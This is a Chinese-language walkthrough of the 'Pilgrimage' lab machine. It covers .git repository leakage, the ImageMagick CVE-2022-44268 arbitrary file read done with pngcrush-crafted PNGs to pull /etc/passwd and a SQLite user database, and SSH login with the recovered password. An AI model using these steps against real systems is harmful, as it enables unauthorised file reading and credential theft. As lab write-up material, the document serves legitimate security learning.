Pilgrimage 靶机

信息收集

┌──(pytool)─(i3eg1nner㉿minilite)-[~/…/GitTools/Dumper/clone/assets]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.219
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 01:34 EDT
Warning: 10.10.11.219 giving up on port because retransmission cap hit (10).
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.14s latency).
Not shown: 63441 closed tcp ports (reset), 2092 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 33.63 seconds

只开放了两个端口 22 和 80

┌──(pytool)─(i3eg1nner㉿minilite)-[~/…/GitTools/Dumper/clone/assets]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.11.219
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 01:35 EDT
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.0031s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
|   256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_  256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-git:
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: 
image shrinking service initial commit. # Please ...
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: Pilgrimage - Shrink Your Images
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.85 seconds

.git 泄露

80 端口下存在 .git 泄露，或许是个可以利用的点，Debian 操作系统，将域名与 ip 的映射写入 hosts 文件后，使用浏览器访问，同时进行目录爆破

┌──(pytool)─(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ sudo dirsearch -u http://pilgrimage.htb

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/pilgrimage.htb/_23-07-08_01-54-25.txt

Error Log: /root/.dirsearch/logs/errors-23-07-08_01-54-25.log

Target: http://pilgrimage.htb/

[01:54:25] Starting:
[01:54:26] 403 -  555B  - /.git/
[01:54:26] 403 -  555B  - /.git/branches/
[01:54:26] 200 -   92B  - /.git/config
[01:54:26] 200 -   23B  - /.git/HEAD
[01:54:26] 200 -   73B  - /.git/description
[01:54:26] 200 -    2KB - /.git/COMMIT_EDITMSG
[01:54:26] 403 -  555B  - /.git/hooks/
[01:54:26] 301 -  169B  - /.git  ->  http://pilgrimage.htb/.git/
[01:54:26] 200 -  240B  - /.git/info/exclude
[01:54:26] 403 -  555B  - /.git/logs/
[01:54:26] 403 -  555B  - /.git/info/
[01:54:26] 200 -  195B  - /.git/logs/HEAD
[01:54:26] 403 -  555B  - /.git/refs/
[01:54:26] 301 -  169B  - /.git/logs/refs  ->  http://pilgrimage.htb/.git/logs/refs/
[01:54:26] 301 -  169B  - /.git/logs/refs/heads  ->  http://pilgrimage.htb/.git/logs/refs/heads/
[01:54:26] 301 -  169B  - /.git/refs/heads  ->  http://pilgrimage.htb/.git/refs/heads/
[01:54:26] 200 -  195B  - /.git/logs/refs/heads/master
[01:54:26] 403 -  555B  - /.git/objects/
[01:54:26] 200 -   41B  - /.git/refs/heads/master
[01:54:26] 301 -  169B  - /.git/refs/tags  ->  http://pilgrimage.htb/.git/refs/tags/
[01:54:26] 200 -    4KB - /.git/index
[01:54:26] 403 -  555B  - /.ht_wsr.txt
[01:54:26] 403 -  555B  - /.htaccess.bak1
[01:54:26] 403 -  555B  - /.htaccess.orig
[01:54:26] 403 -  555B  - /.htaccess.save
[01:54:26] 403 -  555B  - /.htaccess_extra
[01:54:26] 403 -  555B  - /.htaccess.sample
[01:54:26] 403 -  555B  - /.htaccess_orig
[01:54:26] 403 -  555B  - /.htaccessOLD
[01:54:26] 403 -  555B  - /.htaccessBAK
[01:54:26] 403 -  555B  - /.htaccess_sc
[01:54:26] 403 -  555B  - /.htpasswd_test
[01:54:26] 403 -  555B  - /.htm
[01:54:26] 403 -  555B  - /.htaccessOLD2
[01:54:26] 403 -  555B  - /.html
[01:54:26] 403 -  555B  - /.htpasswds
[01:54:26] 403 -  555B  - /.httr-oauth
[01:54:33] 403 -  555B  - /admin/.htaccess
[01:54:36] 403 -  555B  - /administrator/.htaccess
[01:54:37] 403 -  555B  - /app/.htaccess
[01:54:37] 301 -  169B  - /assets  ->  http://pilgrimage.htb/assets/
[01:54:37] 403 -  555B  - /assets/
[01:54:42] 302 -    0B  - /dashboard.php  ->  /login.php
[01:54:48] 200 -    7KB - /index.php
[01:54:50] 200 -    6KB - /login.php
[01:54:50] 302 -    0B  - /logout.php  ->  /
[01:54:58] 200 -    6KB - /register.php
[01:55:04] 301 -  169B  - /tmp  ->  http://pilgrimage.htb/tmp/
[01:55:04] 403 -  555B  - /tmp/
[01:55:06] 403 -  555B  - /vendor/

Task Completed

目录的爆破的结果中最值得关注的只有 .git，搜索 ".git" expose

第二个链接中 Exposed .git Directory Exploitation | by Yani | InfoSec Write-ups (infosecwriteups.com)，提到了一个工具 GitTools，将其下载到本地，然后根据说明来进行操作：internetwache/GitTools: A repository with 3 tools for pwn’ing websites with .git repositories available (github.com)

Dumper: This tool can be used to download as much as possible from the found .git repository from webservers which do not have directory listing enabled.

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper]
└─$ ./gitdumper.sh http://pilgrimage.htb/.git/ clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating clone/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/e1/a40beebc7035212efdcb15476f9c994e3634a7
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/f3/e708fd3c3689d0f437b2140e08997dbaff6212
[+] Downloaded: objects/93/ed6c0458c9a366473a6bcb919b1033f16e7a8d
[+] Downloaded: objects/c2/cbe0c97b6f3117d4ab516b423542e5fe7757bc
[+] Downloaded: objects/6c/965df00a57fd13ad50b5bbe0ae1746cdf6403d
[+] Downloaded: objects/dc/446514835fe49994e27a1c2cf35c9e45916c71
[+] Downloaded: objects/46/44c40a1f15a1eed9a8455e6ac2a0be29b5bf9e
[+] Downloaded: objects/f1/8fa9173e9f7c1b2f30f3d20c4a303e18d88548
[+] Downloaded: objects/c4/18930edec4da46019a1bac06ecb6ec6f7975bb
[+] Downloaded: objects/36/c734d44fe952682020fd9762ee9329af51848d
[+] Downloaded: objects/b2/15e14bb4766deff4fb926e1aa080834935d348
[+] Downloaded: objects/8f/155a75593279c9723a1b15e5624a304a174af2
[+] Downloaded: objects/9e/ace5d0e0c82bff5c93695ac485fe52348c855e
[+] Downloaded: objects/a7/3926e2965989a71725516555bcc1fe2c7d4f9e
[+] Downloaded: objects/98/10e80fba2c826a142e241d0f65a07ee580eaad
[+] Downloaded: objects/26/8dbf75d02f0d622ac4ff9e402175eacbbaeddd
[+] Downloaded: objects/81/703757c43fe30d0f3c6157a1c20f0fea7331fc
[+] Downloaded: objects/76/a559577d4f759fff6af1249b4a277f352822d5
[+] Downloaded: objects/ff/dbd328a3efc5dad2a97be47e64d341d696576c
[+] Downloaded: objects/f2/b67ac629e09e9143d201e9e7ba6a83ee02d66e
[+] Downloaded: objects/8a/62aac3b8e9105766f3873443758b7ddf18d838
[+] Downloaded: objects/e9/2c0655b5ac3ec2bfbdd015294ddcbe054fb783
[+] Downloaded: objects/c2/a4c2fd4e5b2374c6e212d1800097e3b30ff4e2
[+] Downloaded: objects/88/16d69710c5d2ee58db84afa5691495878f4ee1
[+] Downloaded: objects/96/3349e4f7a7a35c8f97043c20190efbe20d159a
[+] Downloaded: objects/2f/9156e434cfa6204c9d48733ee5c0d86a8a4e23
[+] Downloaded: objects/b6/c438e8ba16336198c2e62fee337e126257b909
[+] Downloaded: objects/11/dbdd149e3a657bc59750b35e1136af861a579f
[+] Downloaded: objects/c3/27c2362dd4f8eb980f6908c49f8ef014d19568
[+] Downloaded: objects/8e/42bc52e73caeaef5e58ae0d9844579f8e1ae18
[+] Downloaded: objects/5f/ec5e0946296a0f09badeb08571519918c3da77
[+] Downloaded: objects/50/210eb2a1620ef4c4104c16ee7fac16a2c83987
[+] Downloaded: objects/06/19fc1c747e6278bbd51a30de28b3fcccbd848a
[+] Downloaded: objects/54/4d28df79fe7e6757328f7ecddf37a9aac17322
[+] Downloaded: objects/1f/8ddab827030fbc81b7cb4441ec4c9809a48bc1
[+] Downloaded: objects/47/6364752c5fa7ad9aa10f471dc955aac3d3cf34
[+] Downloaded: objects/b4/21518638bfb4725d72cc0980d8dcaf6074abe7
[+] Downloaded: objects/49/cd436cf92cc28645e5a8be4b1973683c95c537
[+] Downloaded: objects/1f/2ef7cfabc9cf1d117d7a88f3a63cadbb40cca3
[+] Downloaded: objects/23/1150acdd01bbbef94dfb9da9f79476bfbb16fc
[+] Downloaded: objects/ca/d9dfca08306027b234ddc2166c838de9301487
[+] Downloaded: objects/fd/90fe8e067b4e75012c097a088073dd1d3e75a4
[+] Downloaded: objects/c4/3565452792f19d2cf2340266dbecb82f2a0571
[+] Downloaded: objects/29/4ee966c8b135ea3e299b7ca49c450e78870b59
[+] Downloaded: objects/fb/f9e44d80c149c822db0b575dbfdc4625744aa4
[+] Downloaded: objects/2b/95e3c61cd8f7f0b7887a8151207b204d576e14
[+] Downloaded: objects/a5/29d883c76f026420aed8dbcbd4c245ed9a7c0b
[-] Downloaded: objects/23/12310101010101010101410301010101210101
[-] Downloaded: objects/23/03032323230123232323212123212303632303
[-] Downloaded: objects/23/21236303230321632123036767012147470701
[-] Downloaded: objects/47/07412547250503474341056701016565070147
[-] Downloaded: objects/41/61416543747052570741470565674701054165
[-] Downloaded: objects/65/43450543454147054147414565014170505650
[-] Downloaded: objects/54/74547454747476767476767676767236323632
[-] Downloaded: objects/36/76745054545454545456545454545454545454
[-] Downloaded: objects/76/76701676767670105676767672167676767010
[+] Downloaded: objects/cd/2774e97bfe313f2ec2b8dc8285ec90688c5adb
[+] Downloaded: objects/fa/175a75d40a7be5c3c5dee79b36f626de328f2e

http://pilgrimage.htb/.git/ 是目标目录，并且需要把最后一个 / 也给到参数，第二个参数是输出的目录，这里按照示例中那样命名为 clone，下载成功后进入 clone 目录，查看 git 的信息

# git log 查看本地日志
┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ git log
commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master)
Author: emily <emily@pilgrimage.htb>
Date:   Wed Jun 7 20:11:48 2023 +1000

    Pilgrimage image shrinking service initial commit.

# git status 查看最近的更改
┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ git status
On branch master
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        deleted:    assets/bulletproof.php
        deleted:    assets/css/animate.css
        deleted:    assets/css/custom.css
        deleted:    assets/css/flex-slider.css
        deleted:    assets/css/fontawesome.css
        deleted:    assets/css/owl.css
        deleted:    assets/css/templatemo-woox-travel.css
        deleted:    assets/images/banner-04.jpg
        deleted:    assets/images/cta-bg.jpg
        deleted:    assets/js/custom.js
        deleted:    assets/js/isotope.js
        deleted:    assets/js/isotope.min.js
        deleted:    assets/js/owl-carousel.js
        deleted:    assets/js/popup.js
        deleted:    assets/js/tabs.js
        deleted:    assets/webfonts/fa-brands-400.ttf
        deleted:    assets/webfonts/fa-brands-400.woff2
        deleted:    assets/webfonts/fa-regular-400.ttf
        deleted:    assets/webfonts/fa-regular-400.woff2
        deleted:    assets/webfonts/fa-solid-900.ttf
        deleted:    assets/webfonts/fa-solid-900.woff2
        deleted:    assets/webfonts/fa-v4compatibility.ttf
        deleted:    assets/webfonts/fa-v4compatibility.woff2
        deleted:    dashboard.php
        deleted:    index.php
        deleted:    login.php
        deleted:    logout.php
        deleted:    magick
        deleted:    register.php
        deleted:    vendor/bootstrap/css/bootstrap.min.css
        deleted:    vendor/bootstrap/js/bootstrap.min.js
        deleted:    vendor/jquery/jquery.js
        deleted:    vendor/jquery/jquery.min.js
        deleted:    vendor/jquery/jquery.min.map
        deleted:    vendor/jquery/jquery.slim.js
        deleted:    vendor/jquery/jquery.slim.min.js
        deleted:    vendor/jquery/jquery.slim.min.map

no changes added to commit (use "git add" and/or "git commit -a")

通过查看日志和状态，我们看到有些文件被删除了，接下来可以使用命令来恢复

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ git checkout -- .

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ls -liah
total 27M
982572 drwxr-xr-x 5 i3eg1nner i3eg1nner 4.0K Jul  8 03:58 .
982207 drwxr-xr-x 3 i3eg1nner i3eg1nner 4.0K Jul  8 03:44 ..
982703 drwxr-xr-x 6 i3eg1nner i3eg1nner 4.0K Jul  8 03:58 assets
982731 -rwxr-xr-x 1 i3eg1nner i3eg1nner 5.5K Jul  8 03:58 dashboard.php
982573 drwxr-xr-x 6 i3eg1nner i3eg1nner 4.0K Jul  8 03:58 .git
982732 -rwxr-xr-x 1 i3eg1nner i3eg1nner 9.1K Jul  8 03:58 index.php
982733 -rwxr-xr-x 1 i3eg1nner i3eg1nner 6.7K Jul  8 03:58 login.php
982734 -rwxr-xr-x 1 i3eg1nner i3eg1nner   98 Jul  8 03:58 logout.php
982735 -rwxr-xr-x 1 i3eg1nner i3eg1nner  27M Jul  8 03:58 magick
982736 -rwxr-xr-x 1 i3eg1nner i3eg1nner 6.7K Jul  8 03:58 register.php
982737 drwxr-xr-x 4 i3eg1nner i3eg1nner 4.0K Jul  8 03:58 vendor

恢复后，我们简单查看各个文件和目录

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ tree
.
├── assets
│   ├── bulletproof.php
│   ├── css
│   │   ├── animate.css
│   │   ├── custom.css
│   │   ├── flex-slider.css
│   │   ├── fontawesome.css
│   │   ├── owl.css
│   │   └── templatemo-woox-travel.css
│   ├── images
│   │   ├── banner-04.jpg
│   │   └── cta-bg.jpg
│   ├── js
│   │   ├── custom.js
│   │   ├── isotope.js
│   │   ├── isotope.min.js
│   │   ├── owl-carousel.js
│   │   ├── popup.js
│   │   └── tabs.js
│   └── webfonts
│       ├── fa-brands-400.ttf
│       ├── fa-brands-400.woff2
│       ├── fa-regular-400.ttf
│       ├── fa-regular-400.woff2
│       ├── fa-solid-900.ttf
│       ├── fa-solid-900.woff2
│       ├── fa-v4compatibility.ttf
│       └── fa-v4compatibility.woff2
├── dashboard.php
├── index.php
├── login.php
├── logout.php
├── magick
├── register.php
└── vendor
    ├── bootstrap
    │   ├── css
    │   │   └── bootstrap.min.css
    │   └── js
    │       └── bootstrap.min.js
    └── jquery
        ├── jquery.js
        ├── jquery.min.js
        ├── jquery.min.map
        ├── jquery.slim.js
        ├── jquery.slim.min.js
        └── jquery.slim.min.map

11 directories, 37 files

发现连接的数据库和一个特殊的可执行文件

if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['username'] && $_POST['password']) {
  $username = $_POST['username'];
  $password = $_POST['password'];

  $db = new PDO('sqlite:/var/db/pilgrimage');
  $stmt = $db->prepare("SELECT * FROM users WHERE username = ? and password = ?");
  $stmt->execute(array($username,$password));

  if($stmt->fetchAll()) {
    $_SESSION['user'] = $username;
    header("Location: /dashboard.php");
  }
  else {
    header("Location: /login.php?message=Login failed&status=fail");
  }
}

顺便测试了一下 sql 注入，使用了 sqlmap，不过没成功

1	`sqlmap -u http://pilgrimage.htb/login.php --forms`

之前对于 POST 注入，更多的是使用 burp 抓包然后保存为本地文件，再使用 sqlmap 操作，推荐这篇教程看看另外两种方法：4.1 SqlMap之POST登陆框注入实战_「SqlMap中文版使用教程」 - 网安 (wangan.com)

Imagemagick 任意文件读取漏洞

那接下来就只有个可疑的可执行文件了，由于这个文件太大，尝试读取后没什么收获，我选择了直接执行试试，不过这里建议对于这些文件不要在本机中直接执行，防止有安全问题

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ./magick
Error: Invalid argument or not enough arguments

Usage: magick tool [ {option} | {image} ... ] {output_image}
Usage: magick [ {option} | {image} ... ] {output_image}
       magick [ {option} | {image} ... ] -script {filename} [ {script_args} ...]
       magick -help | -version | -usage | -list {option}

报错给了一些使用方法的教程

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

看了一眼 version，然后去谷歌这个工具到底是在干嘛

一个开源的图片处理工具，结合我们对首页的观察，大概可以判断出网站是在使用这个工具对用户上传的图片进行处理，此外这个工具的最新版是 7.1.1，但是 .git 泄露的文件中其版本号为 7.1.0-49，或许存在漏洞，尝试谷歌一下

存在任意文件读取漏洞，根据 CVE 来找 PoC：

voidz0r/CVE-2022-44268: A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read (github.com)

这个脚本运行会提示 cargo 不存在，我不确定是否是需要我本机安装，找了个别的 PoC：

duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC: CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator (github.com)

# 安装依赖
apt-get install pngcrush imagemagick exiftool exiv2 -y

# 本机找一个png文件命名为vjp.png，将自己想查看的文件名放入参数中，工具会将其写入图片里
┌──(i3eg1nner㉿minilite)-[~/Downloads/Pilgrimage]
└─$ pngcrush -text a "profile" "/etc/hosts" vjp.png
  Recompressing IDAT chunks in vjp.png to pngout.png
   Total length of data found in critical chunks            =     32339
   Best pngcrush method        =   6 (ws 15 fm 6 zl 9 zs 0) =     32134
CPU time decode 0.017508, encode 0.292588, other 0.002413, total 0.314946 sec

# 看到信息是否被写入其中
┌──(i3eg1nner㉿minilite)-[~/Downloads/Pilgrimage]
└─$ exiv2 -pS pngout.png
STRUCTURE OF PNG FILE: pngout.png
 address | chunk |  length | data                           | checksum
       8 | IHDR  |      13 | ............                   | 0xf7f684ff
      33 | pHYs  |       9 | .........                      | 0x952b0e1b
      54 | IDAT  |   32077 | x......E....9...&..!.9D....Q.V | 0x26fba351
   32143 | tEXt  |      19 | profile./etc/passwd            | 0x465bd758
   32174 | IEND  |       0 |                                | 0xae426082

# 将图像上传到易受攻击的服务来触发 PoC

将上面数据部分复制下来，通过 python 来解码

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ python3 -c 'print(bytes.fromhex("726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f7362696e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f7573722f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c697374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f7362696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a36353533343a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f726b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d656e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d64205265736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e6578697374656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e697a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a783a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a3939383a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a").decode("utf-8"))'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

验证成功，确实存在任意文件读取漏洞，尝试读取 shadow 文件，失败。尝试读取 login.php 中提到的数据库文件

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ pngcrush -text a "profile" "/var/db/pilgrimage" vjp.png
  Recompressing IDAT chunks in vjp.png to pngout.png
   Total length of data found in critical chunks            =      2206
   Best pngcrush method        =   4 (ws 15 fm 0 zl 9 zs 1) =      1201
CPU time decode 0.001379, encode 0.005750, other 0.000666, total 0.008438 sec

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ exiv2 -pS pngout.png                            
STRUCTURE OF PNG FILE: pngout.png
 address | chunk |  length | data                           | checksum
       8 | IHDR  |      13 | ............                   | 0xbeb798c5
      33 | pHYs  |       9 | .........                      | 0x009a9c18
      54 | tIME  |       7 | ......(                        | 0xc6655cae
      73 | tEXt  |      29 | Comment.Created with The GIMP  | 0xef64256e
     114 | IDAT  |    1144 | x..._lSU.....j'.....O......8P. | 0xfa9e0ce2
    1270 | tEXt  |      26 | profile./var/db/pilgrimage     | 0x704d8d3d
    1308 | IEND  |       0 |                                | 0xae426082

遇到个问题，0 数据太多，那就将有意义的部分截取下来放入刚才的解码命令中，最后发现了一个和之前 git log 中显示的用户名相同的有效字符

1
2
3

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ python3 -c 'print(bytes.fromhex("180103172d656d696c796162696763686f6e6b79626f693132330a000000010ff7000ff7"))'
b'\x18\x01\x03\x17-emilyabigchonkyboi123\n\x00\x00\x00\x01\x0f\xf7\x00\x0f\xf7'

尝试 ssh 登录，密码使用 abigchonkyboi123 和 emilyabigchonkyboi123 进行尝试

┌──(pytool)─(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ssh emily@10.10.11.219
The authenticity of host '10.10.11.219 (10.10.11.219)' can\'t be established.
ED25519 key fingerprint is SHA256:uaiHXGDnyKgs1xFxqBduddalajktO+mnpNkqx/HjsBw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.219' (ED25519) to the list of known hosts.
emily@10.10.11.219\'s password:
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul  8 16:07:48 2023 from 10.10.16.42
emily@pilgrimage:~$ whoami
emily
emily@pilgrimage:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:e8:f2 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
emily@pilgrimage:~$ id
uid=1000(emily) gid=1000(emily) groups=1000(emily)
emily@pilgrimage:~$ uname -a
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
emily@pilgrimage:~$ ls -liah
total 36K
30 drwxr-xr-x 4 emily emily 4.0K Jul  8 16:10 .
39 drwxr-xr-x 3 root  root  4.0K Jun  8 00:10 ..
43 lrwxrwxrwx 1 emily emily    9 Feb 10 13:42 .bash_history -> /dev/null
35 -rw-r--r-- 1 emily emily  220 Feb 10 13:41 .bash_logout
33 -rw-r--r-- 1 emily emily 3.5K Feb 10 13:41 .bashrc
44 drwxr-xr-x 3 emily emily 4.0K Jun  8 00:10 .config
46 -rw-r--r-- 1 emily emily   44 Jun  1 19:15 .gitconfig
55 drwxr-xr-x 3 emily emily 4.0K Jun  8 00:10 .local
34 -rw-r--r-- 1 emily emily  807 Feb 10 13:41 .profile
